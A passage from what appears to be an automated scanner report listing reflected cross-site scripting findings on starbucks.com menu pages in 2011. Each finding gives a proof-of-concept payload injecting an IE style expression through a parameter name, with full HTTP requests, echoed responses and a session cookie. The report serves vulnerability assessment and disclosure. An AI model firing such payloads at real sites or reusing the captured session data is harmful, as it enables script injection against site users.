The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 895ee"style%3d"x%3aexpression(alert(1))"e3d116c9abe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 895ee"style="x:expression(alert(1))"e3d116c9abe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/bottled-drinks/cinnamon-dolce-doubleshot-with-energy?895ee"style%3d"x%3aexpression(alert(1))"e3d116c9abe=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:29:31 GMT
Connection: close
Content-Length: 39704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/bottled-drinks/cinnamon-dolce-doubleshot-with-energy?895ee"style="x:expression(alert(1))"e3d116c9abe=1"/>
...[SNIP]...

1.700. http://www.starbucks.com/menu/drinks/bottled-drinks/coffee-doubleshot-with-energy [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/coffee-doubleshot-with-energy

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe726"style%3d"x%3aexpression(alert(1))"d19a9e87e85 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fe726"style="x:expression(alert(1))"d19a9e87e85 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/bottled-drinks/coffee-doubleshot-with-energy?fe726"style%3d"x%3aexpression(alert(1))"d19a9e87e85=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:29:38 GMT
Connection: close
Content-Length: 39838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/bottled-drinks/coffee-doubleshot-with-energy?fe726"style="x:expression(alert(1))"d19a9e87e85=1"/>
...[SNIP]...

1.701. http://www.starbucks.com/menu/drinks/bottled-drinks/coffee-frappuccino [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/coffee-frappuccino

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76702"style%3d"x%3aexpression(alert(1))"b4ae84575bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 76702"style="x:expression(alert(1))"b4ae84575bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/bottled-drinks/coffee-frappuccino?76702"style%3d"x%3aexpression(alert(1))"b4ae84575bd=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:30:51 GMT
Connection: close
Content-Length: 39815

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/bottled-drinks/coffee-frappuccino?76702"style="x:expression(alert(1))"b4ae84575bd=1"/>
...[SNIP]...

1.702. http://www.starbucks.com/menu/drinks/bottled-drinks/espresso-and-cream-doubleshot [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/espresso-and-cream-doubleshot

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2267"style%3d"x%3aexpression(alert(1))"213c4c81aec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c2267"style="x:expression(alert(1))"213c4c81aec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/drinks/bottled-drinks/espresso-and-cream-doubleshot?c2267"style%3d"x%3aexpression(alert(1))"213c4c81aec=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:30:30 GMT
Connection: close
Content-Length: 39894

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/bottled-drinks/espresso-and-cream-doubleshot?c2267"style="x:expression(alert(1))"213c4c81aec=1"/>
...[SNIP]...

1.703. http://www.starbucks.com/menu/drinks/bottled-drinks/espresso-and-cream-light-doubleshot [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/espresso-and-cream-light-doubleshot

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 946db"style%3d"x%3aexpression(alert(1))"31b738e1403 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 946db"style="x:expression(alert(1))"31b738e1403 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /menu/drinks/bottled-drinks/espresso-and-cream-light-doubleshot?946db"style%3d"x%3aexpression(alert(1))"31b738e1403=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:31:33 GMT
Connection: close
Content-Length: 39754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/bottled-drinks/espresso-and-cream-light-doubleshot?946db"style="x:expression(alert(1))"31b738e1403=1"/>
...[SNIP]...

1.704. http://www.starbucks.com/menu/drinks/bottled-drinks/mocha-doubleshot-with-energy [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/mocha-doubleshot-with-energy

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a9dc"style%3d"x%3aexpression(alert(1))"2308b961066 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2a9dc"style="x:expression(alert(1))"2308b961066 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /menu/drinks/bottled-drinks/mocha-doubleshot-with-energy?2a9dc"style%3d"x%3aexpression(alert(1))"2308b961066=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:30:11 GMT
Connection: close
Content-Length: 39974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/bottled-drinks/mocha-doubleshot-with-energy?2a9dc"style="x:expression(alert(1))"2308b961066=1"/>
...[SNIP]...

1.705. http://www.starbucks.com/menu/drinks/bottled-drinks/vanilla-doubleshot-with-energy [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/bottled-drinks/vanilla-doubleshot-with-energy

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3544d"style%3d"x%3aexpression(alert(1))"5aba95253f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3544d"style="x:expression(alert(1))"5aba95253f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /menu/drinks/bottled-drinks/vanilla-doubleshot-with-energy?3544d"style%3d"x%3aexpression(alert(1))"5aba95253f2=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:30:09 GMT
Connection: close
Content-Length: 39870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/bottled-drinks/vanilla-doubleshot-with-energy?3544d"style="x:expression(alert(1))"5aba95253f2=1"/>
...[SNIP]...

1.706. http://www.starbucks.com/menu/drinks/brewed-coffee/bold-pick-of-the-day [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/brewed-coffee/bold-pick-of-the-day

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97603"style%3d"x%3aexpression(alert(1))"ccda16a9e2a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 97603"style="x:expression(alert(1))"ccda16a9e2a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /menu/drinks/brewed-coffee/bold-pick-of-the-day?97603"style%3d"x%3aexpression(alert(1))"ccda16a9e2a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:21:30 GMT
Connection: close
Content-Length: 41233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/brewed-coffee/bold-pick-of-the-day?97603"style="x:expression(alert(1))"ccda16a9e2a=1"/>
...[SNIP]...

1.707. http://www.starbucks.com/menu/drinks/brewed-coffee/cafe-misto [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/brewed-coffee/cafe-misto

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84eea"style%3d"x%3aexpression(alert(1))"3de17d6a195 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 84eea"style="x:expression(alert(1))"3de17d6a195 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /menu/drinks/brewed-coffee/cafe-misto?84eea"style%3d"x%3aexpression(alert(1))"3de17d6a195=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:22:02 GMT
Connection: close
Content-Length: 41226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/brewed-coffee/cafe-misto?84eea"style="x:expression(alert(1))"3de17d6a195=1"/>
...[SNIP]...

1.708. http://www.starbucks.com/menu/drinks/brewed-coffee/clover-brewed-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/brewed-coffee/clover-brewed-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b665"style%3d"x%3aexpression(alert(1))"b850b32aa93 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5b665"style="x:expression(alert(1))"b850b32aa93 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /menu/drinks/brewed-coffee/clover-brewed-coffee?5b665"style%3d"x%3aexpression(alert(1))"b850b32aa93=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:21:33 GMT
Connection: close
Content-Length: 40818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/brewed-coffee/clover-brewed-coffee?5b665"style="x:expression(alert(1))"b850b32aa93=1"/>
...[SNIP]...

1.709. http://www.starbucks.com/menu/drinks/brewed-coffee/coffee-traveler [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/brewed-coffee/coffee-traveler

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea54a"style%3d"x%3aexpression(alert(1))"a6d99dcddd8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ea54a"style="x:expression(alert(1))"a6d99dcddd8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /menu/drinks/brewed-coffee/coffee-traveler?ea54a"style%3d"x%3aexpression(alert(1))"a6d99dcddd8=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:21:39 GMT
Connection: close
Content-Length: 39163

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/brewed-coffee/coffee-traveler?ea54a"style="x:expression(alert(1))"a6d99dcddd8=1"/>
...[SNIP]...

1.710. http://www.starbucks.com/menu/drinks/brewed-coffee/decaf-pike-place-roast [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/brewed-coffee/decaf-pike-place-roast

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75a68"style%3d"x%3aexpression(alert(1))"76d19496ed1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 75a68"style="x:expression(alert(1))"76d19496ed1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /menu/drinks/brewed-coffee/decaf-pike-place-roast?75a68"style%3d"x%3aexpression(alert(1))"76d19496ed1=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:21:44 GMT
Connection: close
Content-Length: 41017

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/brewed-coffee/decaf-pike-place-roast?75a68"style="x:expression(alert(1))"76d19496ed1=1"/>
...[SNIP]...

1.711. http://www.starbucks.com/menu/drinks/brewed-coffee/iced-coffee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/brewed-coffee/iced-coffee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dfea6"style%3d"x%3aexpression(alert(1))"8ec24fe6e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dfea6"style="x:expression(alert(1))"8ec24fe6e3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /menu/drinks/brewed-coffee/iced-coffee?dfea6"style%3d"x%3aexpression(alert(1))"8ec24fe6e3=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:21:44 GMT
Connection: close
Content-Length: 41110

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/brewed-coffee/iced-coffee?dfea6"style="x:expression(alert(1))"8ec24fe6e3=1"/>
...[SNIP]...

1.712. http://www.starbucks.com/menu/drinks/brewed-coffee/pikes-place-roast [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/brewed-coffee/pikes-place-roast

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 127b0"style%3d"x%3aexpression(alert(1))"1a2f3296cc8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 127b0"style="x:expression(alert(1))"1a2f3296cc8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Request

GET /menu/drinks/brewed-coffee/pikes-place-roast?127b0"style%3d"x%3aexpression(alert(1))"1a2f3296cc8=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:21:19 GMT
Connection: close
Content-Length: 40828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/drinks/brewed-coffee/pikes-place-roast?127b0"style="x:expression(alert(1))"1a2f3296cc8=1"/>
...[SNIP]...

1.713. http://www.starbucks.com/menu/drinks/chocolate/hot-chocolate [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
